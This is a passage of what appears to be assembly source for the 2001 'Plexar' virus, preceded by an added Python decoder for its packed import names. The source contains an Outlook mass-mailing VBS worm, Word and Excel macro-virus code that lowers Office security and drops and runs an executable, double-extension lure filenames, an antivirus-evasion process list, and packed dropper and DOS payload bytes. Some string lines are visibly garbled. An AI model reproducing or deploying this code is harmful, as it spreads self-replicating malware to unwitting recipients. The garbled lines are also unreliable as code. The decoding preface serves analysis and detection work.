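The `apis_k32` table stores each Kernel32 import name as a mix of literal ASCII and one-byte token indices (01h to 0Eh) into the `packedapis` word list further down (Create, File, Map, and so on); each name ends in 00h and the table ends in 0FFh, and the resolved addresses land in the `dd` slots that follow, in the same order. Rebuilding the plaintext names is the first step in working out what a sample like this can do and in writing import-based detections for it, since nothing in the binary spells out `CreateFileMappingA`. The Python below is an added example, not part of the Plexar source: it parses a token table and expands a packed name list exactly as described, over two blobs constructed here from the listing. The case of the literal fragments is restored to the Win32 spelling, which the extraction of this page had mangled; that restoration is an assumption of the example.

```python
"""Decode the listing's token-packed import names (added example, not project code)."""

# Constructed from 'packedapis': index 0 is a dummy ("X"), 1..0Eh are the word tokens.
PACKED_TOKENS = (
    b"X\x00"
    b"Create\x00File\x00Map\x00View\x00Close\x00Get\x00Set\x00Find\x00"
    b"Virtual\x00Window\x00Directory\x00Current\x00WaitFor\x00Thread\x00"
    b"\xff"
)

# Constructed from 'apis_k32': token bytes and literal text, 00h between names, 0FFh at the end.
PACKED_NAMES = (
    b"\x01\x02A\x00"
    b"\x01\x02\x03pingA\x00"
    b"\x03\x04Of\x02\x00"
    b"Unmap\x04Of\x02\x00"
    b"\x05Handle\x00"
    b"\x06\x02Size\x00"
    b"\x07\x02Pointer\x00"
    b"\x07EndOf\x02\x00"
    b"\x07\x02AttributesA\x00"
    b"Write\x02\x00"
    b"\x08First\x02A\x00"
    b"\x08Next\x02A\x00"
    b"\x08\x05\x00"
    b"\x09Alloc\x00"
    b"\x09Free\x00"
    b"\x06\x0as\x0bA\x00"
    b"\x06\x0c\x0bA\x00"
    b"\x07\x0c\x0bA\x00"
    b"\x01\x0e\x00"
    b"Exit\x0e\x00"
    b"\x0dMultipleObjects\x00"
    b"\x0dSingleObject\x00"
    b"\x06TickCount\x00"
    b"LoadLibraryA\x00"
    b"Delete\x02A\x00"
    b"\x07\x0ePriority\x00"
    b"\xff"
)

TERMINATOR = 0xFF


def parse_token_table(blob: bytes) -> list:
    """Split the 00h-separated word list; the list index is the token value."""
    tokens, current = [], bytearray()
    for b in blob:
        if b == TERMINATOR:
            break
        if b == 0:
            tokens.append(current.decode("ascii"))
            current = bytearray()
        else:
            current.append(b)
    return tokens


def decode_packed_names(blob: bytes, tokens: list) -> list:
    """Expand each packed name: bytes below len(tokens) are token indices,
    anything else is a literal character; 00h closes a name, 0FFh the table."""
    names, parts = [], []
    for b in blob:
        if b == TERMINATOR:
            break
        if b == 0:
            names.append("".join(parts))
            parts = []
        elif b < len(tokens):            # 01h..0Eh here (0 never reaches this branch)
            parts.append(tokens[b])
        else:
            parts.append(chr(b))
    return names


if __name__ == "__main__":
    for slot, name in enumerate(decode_packed_names(PACKED_NAMES, parse_token_table(PACKED_TOKENS))):
        print(f"slot {slot:2d}: {name}")
```

The decoded list lines up one-to-one with the `createfilea` ... `setthreadpriority` slots declared after the table, which is what lets a detection rule or a disassembler script name each indirect call the sample makes.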

createfilea             dd 00000000h
createfilemappinga      dd 00000000h
mapviewoffile           dd 00000000h
unmapviewoffile         dd 00000000h
closehandle             dd 00000000h
getfilesize             dd 00000000h
setfilepointer          dd 00000000h
setendoffile            dd 00000000h
setfileattributesa      dd 00000000h
writefile               dd 00000000h
findfirstfilea          dd 00000000h
findnextfilea           dd 00000000h
findclose               dd 00000000h
virtualalloc            dd 00000000h
virtualfree             dd 00000000h
getwindowsdirectorya    dd 00000000h
getcurrentdirectorya    dd 00000000h
setcurrentdirectorya    dd 00000000h
createthread            dd 00000000h
exitthread              dd 00000000h
waitformultipleobjects  dd 00000000h
waitforsingleobject     dd 00000000h
gettickcount            dd 00000000h
loadlibrarya            dd 00000000h
deletefilea             dd 00000000h
setthreadpriority       dd 00000000h

kernel32                dd 00000000h
thread_directa          dd 00000000h
thread_wormvbs          dd 00000000h
thread_iword            dd 00000000h
thread_host             dd 00000000h
listo_directa           db 00h

getprocaddress          dd 00000000h
exports                 dd 00000000h
crc32_getprocaddress    equ 0ffc97c1fh
l_getprocaddress        equ 0fh

scriptum                dd 00000000h
guardanom               dd 00000000h
largovbs                db 00h
fhandle_wvbs            dd 00000000h
mhandle_wvbs            dd 00000000h
basemap_wvbs            dd 00000000h

gusano_vbs label near

DB 'on Error Resume Next', 0DH, 0AH

DB 'Set Outlook = CreateObject ("Outlook.Application")', 0DH, 0AH

DB 'IF (Outlook <> ") Then', 0DH, 0AH

DB 'with Outlook', 0DH, 0AH

DB 'set mapi = .GETNAMESPACE ("MAPI")', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'with MAPI', 0DH, 0AH

DB 'set addrlist = .addresslists', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'for i = 1 to addrlist.count', 0DH, 0AH

DB 'with Outlook', 0DH, 0AH

DB 'set nuevomail = .createItem (0)', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'set libroactual = addrlist.Item (i)', 0DH, 0AH

DB 'with Nuevomail', 0DH, 0AH

DB '.attachments.add "'

L_gusano_vbs Equ $ -gusano_vbs

Gusano_vbs2 label Near

DB '", 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'Set Yuca = Libroactual.addressentries', 0DH, 0AH

DB 'with yuca', 0DH, 0AH

DB 'for j = 1 to .count', 0DH, 0AH

DB 'with Nuevomail', 0DH, 0AH

DB 'set bajo = .recipients', 0DH, 0AH

DB 'Bajo.add Yuca (j)', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'next', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'with Nuevomail', 0DH, 0AH

DB '.send', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'next', 0DH, 0AH

DB 'Outlook.quit', 0DH, 0AH

DB 'end, 0DH, 0AH

L_gusano_vbs2 Equ $ -gusano_vbs2

Nombres_varios DB "xd", 00h

DB "Sex.jpg", 20D DUP (""), ".exe", 00h

DB "Porno.gif", 20D DUP (")," .exe ", 00h

DB "free_xxx.jpg", 20D DUP (""), ".exe", 00h

DB "Great_Music.mp3", 20D DUP (""), ".exe", 00h

DB "Check_This.jpg", 20D DUP (""), ".exe", 00h

DB "COOL_PICS.GIF", 20D DUP (""), ".exe", 00h

DB "Love_Story.html", 20D DUP (""), ".exe", 00h

DB "sexy_screensaver.scr", 00h

DB "free_love_screensaver.scr", 00h

DB "eat_my_shorts.scr", 00h

Raxelp_vbs db "raxelp.vbs", 00h

WScript_exe DB "WScript.exe", 00h

Tabla_hex db "0123456789abcdef", 00h

FHANDLE_IW DD 00000000H

MHANDLE_IW DD 00000000H

Basemap_iw dd 00000000h

Tama_iw DD 00000000H

Memoria_iw DD 00000000H

Macaco DB 13D DUP (00h)

Virus_Macro Label Near

DB 'Attribute VB_Name = "plexar", 0DH, 0AH

DB 'SUB AUTO_OPEN (), 0DH, 0AH

DB 'Application.OnSheetActivate = "Infxl", 0DH, 0AH

DB 'End Sub', 0DH, 0AH

DB 'SUB INFXL ()', 0DH, 0AH

DB 'on Error Resume Next', 0DH, 0AH

DB 'set awo = application.activeworkbook', 0DH, 0AH

DB 'set vbp = application.vbe.activevbproject', 0DH, 0AH

DB 'set axo = awo.vbproject.vbcomponents, 0DH, 0AH

DB 'set vbx = vbp.vbcomponents, 0DH, 0AH

DB 'with application: .screenupdating = not-1: .displaystatusbar = not -1: .EnableCanceLKey = NOT-1: .displayalerts = not -1: end with', 0DH, 0AH

DB 'zzz = "plexar": xxx = "C: YYY = Application.startuppath &" /personal.xls ", 0DH, 0AH

DB 'vbx.item (zzz). EXPORT XXX', 0DH, 0AH

DB 'if Axo.item (zzz) .name <> zzz kiln, 0DH, 0AH

DB 'Axo.import xxx: awo.saveas awo.fullname', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'IF (Dir (YYY) = "") Then', 0DH, 0AH

DB 'Workbooks.add.saveas YYY', 0DH, 0AH

DB 'set awo = application.activeworkbook', 0DH, 0AH

DB 'set axo = awo.vbproject.vbcomponents, 0DH, 0AH

DB 'Axo.import XXX', 0DH, 0AH

DB 'ActiveWindow.visible = NOT -1', 0DH, 0AH

DB 'Workbooks ("Personal.xls"). Save', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'Kill XXX', 0DH, 0AH

DB 'Call Correme', 0DH, 0AH

DB 'End Sub', 0DH, 0AH

DB 'SUB AutoClose (), 0DH, 0AH

DB 'on Error Resume Next', 0DH, 0AH

DB 'zzz = "plexar": xxx = "C: / PLX. $$$", 0DH, 0AH

DB 'System.PrivateProfileString ("", "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 9.0 / Word / Security", "Level") = "1", 0DH, 0AH

DB 'System.PrivateProfileString ("," HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 8.0 / Word / Security "," Level ") =" 1 ", 0DH, 0AH

DB 'with options: .virusprotection = (2 * 4 4/6 - 2): .confirmconversions = (2 * 4 4/6 - 2): End with', 0DH, 0AH

DB 'with Application: .displayStatusbar = (2 * 4 4/6 - 2): End with', 0DH, 0AH

DB 'set akt = vbe.activevbproject.vbcomponents, 0DH, 0AH

DB 'set nox = normaltemplate.vbproject.vbcomponents', 0DH, 0AH

DB 'set dox = activeDocument.vbproject.vbcomponents, 0DH, 0AH

DB 'Akt.Item (zzz). EXPORT XXX', 0DH, 0AH

DB 'IF (Nox.Item (zzz) .Name <> zzz) Then', 0DH, 0AH

DB 'NOx.Import XXX', 0DH, 0AH

DB 'NORMALTEMPLATE.SAVE', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'IF (DOX.Item (zzz) .Name <> zzz) Then', 0DH, 0AH

DB 'Dox.Import XXX', 0DH, 0AH

DB 'ActiveDocument.saveas ActiveDocument.FullName', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'Kill XXX', 0DH, 0AH

DB 'Call Correme', 0DH, 0AH

DB 'End Sub', 0DH, 0AH

DB 'Private Sub Correme (), 0DH, 0AH

DB 'on Error Resume Next', 0DH, 0AH

DB 'DIM JODA AS STRING', 0DH, 0AH

DB 'DIM X AS String', 0DH, 0AH

DB 'JODA = "'

L_virus_macro Equ $ -virus_macro

Virus_macro_2 label Near

DB 'for o = 1 to Len (JODA) Step 2', 0DH, 0AH

DB 'x = x chr ("& H" MID (JODA, O, 2))', 0DH, 0AH

DB 'next', 0DH, 0AH

DB 'RAXNAME = Environ ("WINDIR") & "/Raxelp.exe", 0DH, 0AH

DB 'Open RaxName for Binary AS # 1', 0DH, 0AH

DB 'Put # 1, 1, x $', 0DH, 0AH

DB 'Close # 1', 0DH, 0AH

DB 'XOXO = shell (raxname, 0)', 0DH, 0AH

DB 'End Sub', 0DH, 0AH

l_virus_macro_2 equ $-virus_macro_2

nihil           db 00h
memoria         dd 00000000h
raxelp_$$$      db "c:\raxelp.$$$", 00h
plxwrd_vbs      db "plxwrd.vbs", 00h

macro_vbs label near

DB 'on Error Resume Next', 0DH, 0AH

DB 'set word = creteObject ("word.application")', 0DH, 0AH

DB 'IF (Word <> ") Then', 0DH, 0AH

DB 'Word.System.PrivateProfileString ("", "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 9.0 / Word / Security", "Level") = "1", 0DH, 0AH

DB 'Word.System.PrivateProfileString ("", "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 8.0 / Word / Security", "Level") = "1", 0DH, 0AH

DB 'set min = word.application.normaltemplate.vbProject.vbcomponents', 0DH, 0AH

DB 'IF Maca.Item ("plexar"). Name <> "Plexar" Ten', 0DH, 0AH

DB 'Maca.import "C: / Raxelp. $$$", 0DH, 0AH

DB 'Word.Application.NORMALTEMPLATE.SAVE', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'set fso = creteObject ("scripting.filesystemobject")', 0DH, 0AH

DB 'Set Excel = CreateObject ("Excel.Application")', 0DH, 0AH

DB 'IF (Excel <> ") Then', 0DH, 0AH

DB 'YYY = Excel.Application.Startuppath & "/personal.xls"', 0DH, 0AH

DB 'IF (fso.fileexists (yyy) = false) Then', 0DH, 0AH

DB 'Excel.Workbooks.add.saveas YYY', 0DH, 0AH

DB 'Excel.Application.ActiveWorkbook.vbProject.vbComponents.Import "C: / Raxelp. $$$", 0DH, 0AH

DB 'Excel.activeWindow.visible = not -1', 0DH, 0AH

DB 'Excel.Workbooks ("Personal.xls"). Save', 0DH, 0AH

DB 'End If', 0DH, 0AH

DB 'Excel.Application.quit', 0DH, 0AH

DB 'end, 0DH, 0AH

LARGO_MVBS EQU $ -Macro_VBS

FHANDE_DPE DD 00000000H

MHANDLE_DPE DD 00000000H

Basemap_dpe dd 00000000h

Dropper Label Near

DB 04DH, 038H, 05AH, 050H, 038H, 002H, 067H, 002H

DB 004H, 007H, 00FH, 007H, 0FFH, 01CH, 010H, 0B8H

DB 0E1H, 048H, 001H, 040H, 0E0H, 01AH, 0e1H, 00ah

DB 0B3H, 001H, 01CH, 006H, 0BAH, 010H, 000H, 00Eh

DB 01FH, 0B4H, 009H, 0CDH, 021H, 07DH, 0B8H, 067H

DB 04CH, 00AH, 090H, 010H, 054H, 068H, 069H, 073H

DB 007H, 020H, 070H, 072H, 06FH, 067H, 033H, 061H

DB 06DH, 0C7H, 027H, 075H, 0C7H, 074H, 0D3H, 062H

DB 065H, 0C7H, 0FFH, 00FH, 06EH, 099H, 006H, 064H

DB 0E7H, 0C7H, 0D3H, 057H, 069H, 0D0H, 033H, 032H

DB 00DH, 01CH, 00AH, 024H, 037H, 029H, 001H, 057H

DB 063H, 050H, 045H, 001H, 005H, 04CH, 001H, 005H

DB 001H, 099H, 02BH, 05CH, 0A3H, 058H, 014H, 0E0H

DB 0E0H, 08EH, 004H, 081H, 00BH, 001H, 002H, 019H

DB 08DH, 019H, 022H, 007H, 08AH, 010H, 004H, 064H

DB 020H, 099H, 01EH, 056H, 00CH, 041H, 053H, 001H

DB 01FH, 038H, 003H, 029H, 00ah, 009H, 012H, 070H

DB 036H, 04DH, 002H, 0A4H, 01FH, 0A4H, 035H, 053H

DB 020H, 008H, 07BH, 0A5H, 04BH, 02BH, 001H, 0B2H

DB 097H, 0A2H, 02EH, 00ah, 060H, 038H, 052H, 0BCH

DB 0A1H, 0D4H, 061H, 0F8H, 0EBH, 0C1H, 043H, 04FH

DB 044H, 045H, 05BH, 0D8H, 022H, 002H, 056H, 006H

DB 024H, 095H, 0B7H, 007H, 0E0H, 044H, 041H, 054H

DB 02AH, 00DH, 0CAH, 004H, 091H, 012H, 035H, 008H

DB 050H, 07CH, 0C3H, 0C0H, 007H, 02EH, 069H, 064H

DB 061H, 074H, 02AH, 04CH, 06DH, 023H, 026H, 03CH

DB 0D4H, 028H, 0E0H, 072H, 065H, 06CH, 023H, 06FH

DB 063H, 091H, 050H, 0C8H, 01CH, 056H, 040H, 050H

DB 073H, 0E4H, 063H, 0E1H, 01DH, 022H, 01CH, 08AH

DB 01EH, 028H, 054H, 0E1H, 05AH, 001H, 0FFH, 0B0H

DB 033H, 0C0H, 050H, 084H, 030H, 0E8H, 01DH, 019H

DB 068H, 088H, 013H, 0DEH, 00AH, 099H, 007H, 015H

DB 06AH, 091H, 00Eh, 006H, 007H, 0FFH, 025H, 050H

DB 040H, 01CH, 00DH, 054H, 086H, 045H, 05CH, 04BH

DB 001H, 0FEH, 0BFH, 0C9H, 03CH, 0F1H, 0D4H, 0C6H

DB 064H, 019H, 065H, 050H, 009H, 048H, 02CH, 014H

DB 071H, 089H, 05CH, 03EH, 03EH, 0F8H, 033H, 07CH

DB 031H, 084H, 0A4H, 063H, 092H, 0E5H, 06AH, 014H

DB 007H, 04BH, 045H, 052H, 04EH, 030H, 04CH, 033H

DB 032H, 02EH, 038H, 064H, 06CH, 0F0H, 035H, 055H

DB 053H, 01CH, 036H, 00BH, 002H, 0F9H, 0D9H, 065H

DB 0C6H, 0F4H, 031H, 080H, 045H, 078H, 069H, 074H

DB 050H, 072H, 03FH, 06FH, 063H, 038H, 073H, 0EFH

DB 01DH, 058H, 02AH, 06BH, 04DH, 0C7H, 017H, 061H

DB 067H, 094H, 041H, 0CFH, 001H, 0AAH, 0D7H, 0B6H

DB 097H, 00Eh, 01FH, 030H, 025H, 04EH, 02BH, 097H

DB 07FH, 004H, 0BEH, 004H, 0B2H, 02FH, 07AH, 03BH

DB 063H, 002H, 083H, 003H, 05FH, 00DH, 081H, 0E7H

DB 080H, 00EH, 091H, 011H, 038H, 056H, 020H, 08BH

DB 001H, 0F9H, 0F0H, 015H, 050H, 018H, 0B5H, 008H

DB 014H, 0A0H, 094H, 068H, 030H, 0ACH, 00AH, 0BFH

DB 08AH, 02CH, 015H, 029H, 018H, 071H, 090H, 011H

DB 0B4H, 060H, 001H, 0E8H, 002H, 04EH, 08CH, 02FH

DB 09CH, 0C1H, 0F5H, 014H, 04FH, 09CH, 038H, 009H

DB 038H, 049H, 032H, 044H, 009H, 05FH, 027H, 043H

DB 007H, 04FH, 007H, 04EH, 007H, 031H, 005H, 028H

DB 067H, 0A4H, 005H, 040H, 04AH, 04AH, 004H, 028H

DB 08AH, 080H, 002H, 0DEH, 0D4H, 056H, 080H, 081H

DB 077H, 0F1H, 049H, 007H, 046H, 002H, 013H, 06DH

DB 0C0H, 002H, 010H, 047H, 009H, 005H, 0FFH, 05CH

DB 003H, 03BH, 0F8H, 0A4H, 007H, 0A2H, 002H, 08CH

DB 013H, 00BH, 0AH, 0C3H, 003H, 007H, 077H, 087H

DB 097H, 036H, 078H, 009H, 063H, 00AH, 018H, 0A2H

DB 022H, 03FH, 002H, 020H, 046H, 03CH, 070H, 0FDH

DB 033H, 00ah, 0A2H, 04BH, 0F0H, 086H, 016H, 0A1H

DB 010H, 08FH, 0E5H, 00FH, 0C2H, 013H, 00DH, 022H

DB 007H, 088H, 008H, 05FH, 0AAH, 09BH, 010H, 06FH

DB 00FH, 010H, 0ADH, 007H, 041H, 0C3H, 01BH, 03EH

DB 020H, 0A2H, 01DH, 072H, 04EH, 0A4H, 040H, 0E1H

DB 046H, 020H, 07CH, 0DCH, 004H, 029H, 010H, 06EH

DB 039H, 04FH, 008H, 09CH, 0DEH, 088H, 06BH, 010H

DB 033H, 03FH, 008H, 0F5H, 00ah, 001H, 077H, 010H

DB 0EDH, 01BH, 094H, 00BH, 087H, 020H, 0B1H, 080H

DB 011H, 0C5H, 010H, 0A9H, 00ah, 020H, 01BH, 001H

DB 016H, 087H, 04CH, 021H, 008H, 08EH, 03EH, 019H

DB 099H, 0FFH, 0E7H, 0D3H, 02AH, 00BH, 010H, 010H

DB 06FH, 009H, 016H, 02CH, 019H, 021H, 091H, 08CH

DB 06EH, 0F0H, 014H, 08FH, 080H, 0F4H, 001H, 019H

DB 011H, 018H, 092H, 0A2H, 09DH, 03FH, 09FH, 01DH

DB 070H, 0A8H, 010H, 06EH, 090H, 0CAH, 054H, 010H

DB 07FH, 089H, 0F9H, 008H, 080H, 0A3H, 0D6H, 07AH

DB 020H, 086H, 0EFH, 00DH, 045H, 093H, 022H, 010H

DB 0F0H, 00DH, 043H, 0A8H, 09CH, 010H, 0DBH, 062H

DB 021H, 0C5H, 019H, 021H, 09CH, 087H, 056H, 010H

DB 0A0H, 071H, 007H, 069H, 07FH, 042H, 009H, 0EBH

DB 02AH, 014H, 0F0H, 04FH, 05FH, 028H, 0CAH, 0F5H

DB 020H, 005H, 090H, 014H, 008H, 099H, 097H, 0D3H

DB 094H, 0F0H, 07AH, 071H, 070H, 092H, 02CH, 0DFH

DB 0D2H, 0F2H, 004H, 0A0H, 04CH, 0B1H, 0CAH, 031H

DB 070H, 02FH, 00AH, 099H, 0A2H, 010H, 047H, 007H

DB 0EAH, 005H, 033H, 020H, 009H, 054H, 081H, 011H

DB 078H, 045H, 080H, 020H, 022H, 099H, 0D5H, 0C1H

DB 010H, 048H, 002H, 050H, 020H, 009H, 06AH, 090H

DB 020H, 021H, 06AH, 030H, 031H, 006H, 00ah, 0A0H

DB 059H, 00CH, 023H, 04EH, 070H, 029H, 02AH, 0A2H

DB 01EH, 0B7H, 0B4H, 028H, 069H, 00ah, 0D0H, 01FH

DB 047H, 079H, 004H, 097H, 05AH, 060H, 04AH, 0EFH

DB 084H, 033H, 088H, 095H, 08FH, 01FH, 062H, 0ECH

DB 09AH, 055H, 072H, 0C4H, 070H, 071H, 020H, 04CH

DB 010H, 0E6H, 0C9H, 0E8H, 05EH, 06EH, 072H, 0BDH

DB 001H, 075H, 0D6H, 0C0H, 000H

Guarda_eip DD 00000000H

Fhandle DD 0000000000h

MHANDLE DD 00000000H

Basemap DD 00000000H

Tama_1 DD 00000000H

Tama_2 DD 00000000H

CRC_PLXR EQU 09EB7DF5H

CRCNOINF DD 056B06AB2H

DD 0C4B3B3AEH

DD 09FAACC5EH

DD 003E9FED8H

DD 071C0B944H

DD 0AEBB798CH

DD 098BEBD89H

DD 0DA2CC2EBH

DD 0527EDB25H

DD 0ee9E3F8BH

DD 0624D4378H

DD 00926128CH

DD 0A6B26D55H

DD 0617F1F35H

DD 05AE2F365H

DD 085B3A1E3H

DD 05CE63D60H

DD 09EA8CB96H

DD 0A0AC0C6DH

; - la foquida tabla - Copyright (C) 2001 Mongolito Enterprises
;
; "DEFR" 56B06AB2
; "SCAN" C4B3B3AE
; "Anti" 9FAACC5E
; "Rund" 03E9FED8
; "WSCR" 71C0B944
; "CSCR" AEBB798C
; "DRWA" 98BEBD89
; "SMAR" DA2CC2EB
; "Task" 527EDB25
; "AVPM" EE9E3F8B
; "AVP3" 624D4378
; "AVPC" 0926128C
; "Avwi" A6B26D55
; "AVCO" 617F1F35
; "VSHW" 5AE2F365
; "FP-W" 85B3A1E3
; "F-ST" 5CE63D60
; "F-PR" 9EA8CB96
; "F-AG" A0AC0C6D
;
; - la foquida tabla - Copyright (C) 2001 Mongolito Enterprises

if debug
mascara         db "bait*.???", 00h
else
mascara         db "*.???", 00h
endif

Busqueda DB sizeof_win32_find_data dup (00h)

Rewtdir DB Max_Path DUP (00h)

BHANDLE DD 00000000H

IF Debug

Puto_puto db ".", 00h

Else

Puto_puto db "..", 00h

ENDIF

LARGPP DD 00000000H

CRC_EXE EQU 0F643C743H

CRC_SCR EQU 096C10707H

Tempapi DB 25D DUP (00h)

ResAVe DD 00000000H

packedapis      db "X", 00h
                db "Create", 00h
                db "File", 00h
                db "Map", 00h
                db "View", 00h
                db "Close", 00h
                db "Get", 00h
                db "Set", 00h
                db "Find", 00h
                db "Virtual", 00h
                db "Window", 00h
                db "Directory", 00h
                db "Current", 00h
                db "WaitFor", 00h
                db "Thread", 00h
                db 0ffh

Pfhandle DD 00000000H

PTEMPORAL DD 00000000H

cocofrio        db "c:\cocofrio.com", 00h
largo_cocofrio  equ $-cocofrio
autoexec        db "c:\autoexec.bat", 00h

PayLoad_Prog Label Near

DB 081H, 0FCH, 0C5H, 005H, 077H, 002H, 0CDH, 020H

DB 0B9H, 037H, 002H, 0BEH, 037H, 003H, 0BFH, 065H

DB 005H, 0BBH, 000H, 080H, 0FDH, 0F3H, 0A4H, 0FCH

DB 087H, 0F7H, 083H, 0EEH, 0C6H, 019H, 0EDH, 057H

DB 057H, 0E9H, 0EDH, 003H, 055H, 050H, 058H, 021H

DB 00BH, 001H, 004H, 008H, 0A7H, 0CBH, 0C1H, 082H

DB 0C6H, 0B5H, 090H, 039H, 000H, 004H, 0A8H, 001H

DB 006H, 0DDH, 0FFH, 0FFH, 0B4H, 02AH, 0CDH, 021H

DB 088H, 016H, 080H, 003H, 080H, 0FEH, 007H, 076H

DB 019H, 033H, 0C0H, 08AH, 0FEH, 0FFH, 0C6H, 0F6H

DB 0E6H, 033H, 0D2H, 0B3H, 005H, 0F6H, 0F3H, 002H

DB 0C2H, 02CH, 004H, 03AH, 006H, 092H, 0DFH, 018H

DB 074H, 019H, 0EBH, 06BH, 090H, 091H, 067H, 003H

DB 004H, 0EFH, 0FFH, 075H, 054H, 0B8H, 012H, 000H

DB 0CDH, 010H, 0B4H, 00Bh, 0BBH, 00Eh, 006H, 0BFH

DB 0FDH, 002H, 033H, 0DBH, 0BAH, 000H, 009H, 008H

DB 0B3H, 039H, 0BEH, 095H, 001H, 0C7H, 0FEH, 0E8H

DB 003H, 070H, 0B3H, 028H, 0BEH, 0CAH, 007H, 024H

DB 0BEH, 0DFH, 0CCH, 016H, 003H, 042H, 0CDH, 016H

DB 0BEH, 054H, 09BH, 0FBH, 003H, 0B3H, 01EH, 0B8H

DB 003H, 02EH, 061H, 0B4H, 0FFH, 0FFH, 00EH, 0ACH

DB 00AH, 0C0H, 074H, 010H, 0B9H, 038H, 000H, 051H

DB 0B9H, 0FFH, 0FFH, 0E2H, 0FEH, 059H, 0F6H, 0DBH

DB 0E2H, 0F7H, 016H, 0EBH, 0EBH, 0B8H, 000H, 04CH

DB 090H, 013H, 0D9H, 020H, 000H, 0C4H, 0FEH, 037H

DB 03CH, 020H, 050H, 04CH, 045H, 058H, 041H, 052H

DB 020H, 03EH, 0B6H, 0FDH, 00DH, 00DH, 00ah, 001h

DB 000H, 028H, 06FH, 057H, 02EH, 000H, 06DH, 061H

DB 073H, 0DFH, 0FEH, 020H, 065H, 06EH, 074H, 072H

DB 065H, 074H, 005H, 069H, 064H, 06FH, 020H, 06EH

DB 0FFH, 071H, 075H, 065H, 020H, 075H, 06EH, 020H

DB 070H, 016H, 065H, 06FH, 07EH, 0EBH, 018H, 020H

DB 019H, 061H, 063H, 074H, 06FH, 072H, 0B2H, 0E6H

DB 029H, 041H, 038H, 0D8H, 096H, 01BH, 070H, 033H

DB 0DFH, 01EH, 06CH, 061H, 004H, 061H, 064H, 065H

DB 063H, 0DFH, 0CAH, 06FH, 020H, 03BH, 06DH, 062H

DB 065H, 06CH, 0B9H, 0B7H, 06CH, 00CH, 069H, 06DH

DB 069H, 05FH, 0B6H, 0BDH, 012H, 075H, 072H, 062H

DB 01EH, 06FH, 047H, 023H, 06CH, 088H, 0ACH, 0B5H

DB 06CH, 02CH, 050H, 04FH, 06DH, 0DBH, 04BH, 020H

DB 047H, 06EH, 05DH, 0B7H, 03DH, 065H, 003H, 061H

DB 04FH, 06CH, 008H, 0FBH, 020H, 067H, 06FH, 063H

DB 068H, 03FH, 06DH, 0D8H, 040H, 061H, 093H, 06DH

DB 041H, 061H, 091H, 061H, 0F7H, 076H, 0C6H, 069H

DB 06CH, 03DH, 04BH, 0B1H, 076H, 074H, 075H, 066H

DB 020H, 03EH, 00Eh, 061H, 080H, 079H, 020H, 0BDH

DB 0FDH, 041H, 062H, 06FH, 084H, 076H, 061H, 072H

DB 06EH, 0B6H, 073H, 06EH, 045H, 078H, 07FH, 0DBH

DB 073H, 06FH, 0C9H, 072H, 00FH, 06DH, 065H, 073H

DB 0B2H, 0B3H, 06DH, 081H, 000H, 043H, 0FFH, 0B7H

DB 04DH, 028H, 063H, 029H, 020H, 032H, 030H, 030H

DB 02FH, 0FFH, 031H, 020H, 04CH, 069H, 074H, 065H

DB 053H, 079H, 02FH, 02FH, 020H, 01EH, 0DCH, 048H

DB 065H, 0B6H, 049H, 056H, 0ADH, 0DDH, 003H, 065H

DB 07AH, 051H, 08FH, 0BBH, 0EDH, 02EH, 000H, 048H

DB 068H, 074H, 09CH, 072H, 06FH, 015H, 000H, 018H

DB 01FH, 0DAH, 0CDH, 09DH, 07AH, 06EH, 064H, 002H

DB 005H, 0D7H, 034H, 05DH, 0EEH, 0C3H, 009H, 0F9H

DB 004H, 0EDH, 00AH, 07BH, 0F7H, 059H, 0C3H, 000H

DB 000H, 040H, 0A8H, 000H, 000H, 000H, 000H, 020H

DB 001H, 0FFH, 0A4H, 0E8H, 034H, 000H, 072H, 0FAH

DB 041H, 0E8H, 029H, 000H, 0E3H, 035H, 073H, 0F9H

DB 083H, 0E9H, 003H, 072H, 006H, 088H, 0CCH, 0ACH

DB 0F7H, 0D0H, 095H, 031H, 0C9H, 0E8H, 015H, 000H

DB 011H, 0C9H, 075H, 008H, 041H, 0E8H, 00DH, 000H

DB 073H, 0FBH, 041H, 041H, 041H, 08DH, 003H, 096H

DB 0F3H, 0A4H, 096H, 0EBH, 0CEH, 0E8H, 002H, 000H

DB 011H, 0C9H, 001H, 0DBH, 075H, 004H, 0ADH, 011H

DB 0C0H, 093H, 0C3H, 05EH, 0B9H, 003H, 000H, 0ACH

DB 02CH, 0E8H, 03CH, 001H, 077H, 0F9H, 0C1H, 004H

DB 008H, 029H, 034H, 0ADH, 0E2H, 0F1H, 0C3H

Largo_pprog Equ $ -PAYLOAD_PROG

Where is Xiyomira? Where is Xomotice? Where is Xomo?

        db      10h dup (90h)

termina_plexar label near

mentira proc
        push    0ah                             ; lang_spanish
        push    040000h or 080000h or 010h      ; MB_TOPMOST or MB_RIGHT or MB_ICONERROR
        push    offset titulo
        push    offset mensaje
        push    0
        call    messageboxexa
        push    0
        call    exitprocess
mentira endp

end empieza_plexar
